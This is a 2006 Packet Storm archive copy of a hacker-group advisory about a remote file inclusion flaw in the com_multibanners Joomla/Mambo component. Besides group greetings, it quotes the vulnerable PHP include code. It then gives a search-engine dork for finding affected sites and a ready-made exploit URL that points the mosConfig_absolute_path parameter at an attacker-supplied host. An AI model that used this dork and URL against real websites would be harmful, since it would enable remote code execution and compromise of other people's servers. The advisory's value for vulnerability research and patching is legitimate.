BlueSpy-adv-multibanners.txt

2006-07-24T00:00:00
ID PACKETSTORM:48452
Type packetstorm
Reporter Blue|Spy
Modified 2006-07-24T00:00:00

Description

                                        
                                            `#############################SolpotCrew Community################################   
#   
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)  
#   
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt  
#   
#################################################################################   
#   
#   
# Bug Found By :Blue|Spy   
#   
# contact: mail@blue-spy.net   
#   
# Website : http://kunamgede.biz, http://blue-spy.net   
#   
################################################################################   
#   
#   
# Greetz: h4ntu , Fungky, Solpot, Matdhule   
# and all crew #mardongan @ irc.dal.net   
#   
#   
###############################################################################   
code from extadminmenus.class.php   
  
if (phpversion() < '4.2.0') {   
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );   
}   
if (phpversion() < '4.3.0') {   
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );   
}   
  
  
Dork:   
inurl:com_multibanners   
  
exploit:   
http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]   
  
  
  
##############################MY LOVE JUST FOR U LIENA#########################   
########################################################################  
  
  
`